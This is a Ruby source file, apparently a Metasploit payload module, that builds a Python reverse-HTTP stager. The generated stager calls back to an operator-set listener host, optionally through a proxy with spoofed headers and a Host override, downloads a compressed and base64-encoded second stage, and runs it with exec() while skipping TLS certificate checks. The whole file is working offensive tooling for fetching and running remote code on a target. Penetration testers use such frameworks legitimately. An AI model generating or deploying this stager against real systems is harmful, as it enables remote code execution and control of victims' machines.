# -*- coding: binary -*-
module Msf
module Payload::Python::ReverseHttp
include Msf::Payload::UUID::Options
def initialize(info = {})
  super(info)
  # Advanced options: operator-controlled HTTP headers plus an outbound
  # HTTP proxy for the stager (both sets come from Msf::Opt).
  advanced = Msf::Opt::http_header_options + Msf::Opt::http_proxy_options
  register_advanced_options(advanced)
  # The generated stager only ever builds an http:// proxy URL (see
  # generate_reverse_http), so a proxy type selector would be misleading.
  deregister_options('HttpProxyType')
end
#
# Generate the first stage
#
# Reads the stager's connection and HTTP settings from the datastore
# (opts[:datastore] when given, else the module datastore), writes them
# into opts in place, defaults :scheme to 'http' when it is nil, and hands
# the result to generate_reverse_http.
#
# LHOST falls back to the placeholder 127.127.127.127 when unset, so a
# stager can still be generated (presumably for size measurement) before
# the operator has picked a listener address.
#
def generate(opts={})
  ds = opts[:datastore] || datastore
  # datastore key per stager option (host is handled separately for its fallback)
  option_map = {
    port: 'LPORT',
    proxy_host: 'HttpProxyHost',
    proxy_port: 'HttpProxyPort',
    proxy_user: 'HttpProxyUser',
    proxy_pass: 'HttpProxyPass',
    user_agent: 'HttpUserAgent',
    header_host: 'HttpHostHeader',
    header_cookie: 'HttpCookie',
    header_referer: 'HttpReferer'
  }
  opts[:host] = ds['LHOST'] || '127.127.127.127'
  option_map.each { |opt_key, ds_key| opts[opt_key] = ds[ds_key] }
  # Only a missing scheme is defaulted; a caller-supplied 'https' is kept.
  opts[:scheme] = 'http' if opts[:scheme].nil?
  generate_reverse_http(opts)
end
#
# Return the callback URL
#
# Builds "scheme://host:port" + luri + the UUID-bearing URI from
# generate_callback_uri. IPv6 hosts are bracketed. Required opts:
# :host, :port, :scheme.
#
# Nothing here is escaped: host, port and LURI are operator-controlled
# datastore values, and the result is later interpolated into a
# single-quoted Python literal, so a quote or backslash in them would
# yield a malformed stager rather than cross a trust boundary.
#
def generate_callback_url(opts)
  host = opts[:host]
  authority = Rex::Socket.is_ipv6?(host) ? "[#{host}]" : host
  "#{opts[:scheme]}://#{authority}:#{opts[:port]}#{luri}#{generate_callback_uri(opts)}"
end
#
# Return the longest URI that fits into our available space
#
# The requested URI length is normally random between 30 + luri.length
# and 255 (presumably so stagers do not share one fixed-length
# fingerprint). When the size budget is unknown (available_space nil or
# dynamic_size?) or smaller than required_space, the shortest 30-byte
# form is requested instead.
#
# opts[:uri_uuid_mode] overrides the default :init_python mode handed to
# generate_uri_uuid_mode together with a freshly generated payload UUID.
#
def generate_callback_uri(opts={})
  floor = 30 + luri.length
  # NOTE(review): Kernel#rand(0) returns a Float and rand(negative) uses
  # the absolute value, so a LURI of 226+ bytes is not handled here.
  chosen_len = floor + rand(256 - floor)
  budget_unknown = self.available_space.nil? || dynamic_size?
  chosen_len = 30 if budget_unknown || required_space > self.available_space
  uuid = generate_payload_uuid(arch: ARCH_PYTHON, platform: 'python')
  mode = opts[:uri_uuid_mode] || :init_python
  generate_uri_uuid_mode(mode, chosen_len, uuid: uuid)
end
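#
# Build the Python stager that fetches and executes the second stage over HTTP(S)
#
# Required opts: :scheme and :user_agent here, plus :host/:port consumed by
# generate_callback_url. Optional: :proxy_host/:proxy_port/:proxy_user/
# :proxy_pass, :header_host, :header_cookie, :header_referer.
#
# Returns the stager source wrapped by py_create_exec_stub.
# Raises ArgumentError when :scheme or :user_agent is nil; previously a nil
# user agent surfaced as a NoMethodError from inside the escaping lambda.
#
# Security notes for operators:
# - With https the stager sets CERT_NONE and check_hostname=False, i.e. it
#   performs no certificate validation at all, so TLS here gives no
#   authentication of the listener and an on-path party can interpose.
# - The proxy URL is always http:// and carries the proxy credentials in
#   cleartext; those credentials also end up verbatim in the generated
#   stager, so treat the stager bytes as containing a secret.
# - The callback URL is interpolated unescaped; its parts are operator
#   datastore values, so a quote there breaks the stager rather than
#   crossing a trust boundary.
#
def generate_reverse_http(opts={})
  raise ArgumentError, 'generate_reverse_http: opts[:scheme] is required' if opts[:scheme].nil?
  raise ArgumentError, 'generate_reverse_http: opts[:user_agent] is required' if opts[:user_agent].nil?

  # Escapes a value for interpolation into a single-quoted Python literal.
  # NOTE(review): this emits four backslashes per backslash and \\' per
  # quote, which a Python literal decodes to two backslashes / a closing
  # quote. Whether a second unescaping layer exists downstream is not
  # visible here; confirm before relying on values containing ' or \.
  var_escape = lambda { |txt|
    txt.gsub('\\', '\\' * 4).gsub('\'', %q(\\\'))
  }

  scheme = opts[:scheme]
  https = scheme == 'https'
  proxy_host = opts[:proxy_host].to_s
  proxy_port = opts[:proxy_port]
  proxy_user = opts[:proxy_user].to_s
  proxy_pass = opts[:proxy_pass].to_s
  use_proxy = !proxy_host.empty?
  # Basic auth is wired up as soon as either half of the credential is set.
  proxy_auth = use_proxy && !(proxy_user.empty? && proxy_pass.empty?)

  # Names pulled from urllib2 / urllib.request; only what the stager uses.
  fromlist = ["'build_opener'"]
  fromlist << "'HTTPSHandler'" if https
  if use_proxy
    fromlist << "'ProxyHandler'"
    fromlist << "'ProxyBasicAuthHandler'" if proxy_auth
  end

  cmd = "import zlib,base64,sys\n"
  cmd << "vi=sys.version_info\n"
  cmd << "ul=__import__({2:'urllib2',3:'urllib.request'}[vi[0]],fromlist=[#{fromlist.join(',')}])\n"
  cmd << "hs=[]\n"
  if https
    # Context added to HTTPSHandler in 2.7.9 and 3.4.3; older interpreters
    # get the default handler. PROTOCOL_SSLv23 is the auto-negotiating
    # constant (presumably kept over the newer PROTOCOL_TLS alias so the
    # version floor above is sufficient).
    cmd << "if (vi[0]==2 and vi>=(2,7,9)) or vi>=(3,4,3):\n"
    cmd << "\timport ssl\n"
    cmd << "\tsc=ssl.SSLContext(ssl.PROTOCOL_SSLv23)\n"
    cmd << "\tsc.check_hostname=False\n"
    cmd << "\tsc.verify_mode=ssl.CERT_NONE\n"
    cmd << "\ths.append(ul.HTTPSHandler(0,sc))\n"
  end
  if use_proxy
    # user:pass@ is percent-encoded so a '@' or ':' in the credential cannot
    # be parsed as part of the authority.
    credentials = ''
    if proxy_auth
      credentials = "#{Rex::Text.uri_encode(proxy_user)}:#{Rex::Text.uri_encode(proxy_pass)}@"
    end
    proxy_authority = Rex::Socket.is_ipv6?(proxy_host) ? "[#{proxy_host}]" : proxy_host
    proxy_url = "http://#{credentials}#{proxy_authority}:#{proxy_port}"
    # The ProxyHandler dict is keyed by the callback scheme so the proxy is
    # only consulted for that scheme.
    cmd << "hs.append(ul.ProxyHandler({'#{scheme}':'#{var_escape.call(proxy_url)}'}))\n"
    cmd << "hs.append(ul.ProxyBasicAuthHandler())\n" if proxy_auth
  end

  headers = ["('User-Agent','#{var_escape.call(opts[:user_agent])}')"]
  headers << "('Cookie','#{var_escape.call(opts[:header_cookie])}')" if opts[:header_cookie]
  headers << "('Referer','#{var_escape.call(opts[:header_referer])}')" if opts[:header_referer]
  cmd << "o=ul.build_opener(*hs)\n"
  cmd << "o.addheaders=[#{headers.join(',')}]\n"

  callback_url = generate_callback_url(opts)
  # The stage is served base64(zlib(code)) and exec'd in place.
  if opts[:header_host]
    # Host override (domain fronting style) goes on the Request, not addheaders.
    cmd << "exec(zlib.decompress(base64.b64decode(o.open(ul.Request('#{callback_url}',None,{'Host':'#{var_escape.call(opts[:header_host])}'})).read())))\n"
  else
    cmd << "exec(zlib.decompress(base64.b64decode(o.open('#{callback_url}').read())))\n"
  end
  py_create_exec_stub(cmd)
end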
#
# Determine the maximum amount of space required for the features requested
#
# Returns cached_size plus two fixed allowances: 100 bytes of slack for the
# encoder and 256 bytes for the longest callback URI generate_callback_uri
# can request (its random length never exceeds 255).
#
def required_space
  encoder_slack = 100
  max_uri_len = 256
  cached_size + encoder_slack + max_uri_len
end
end
end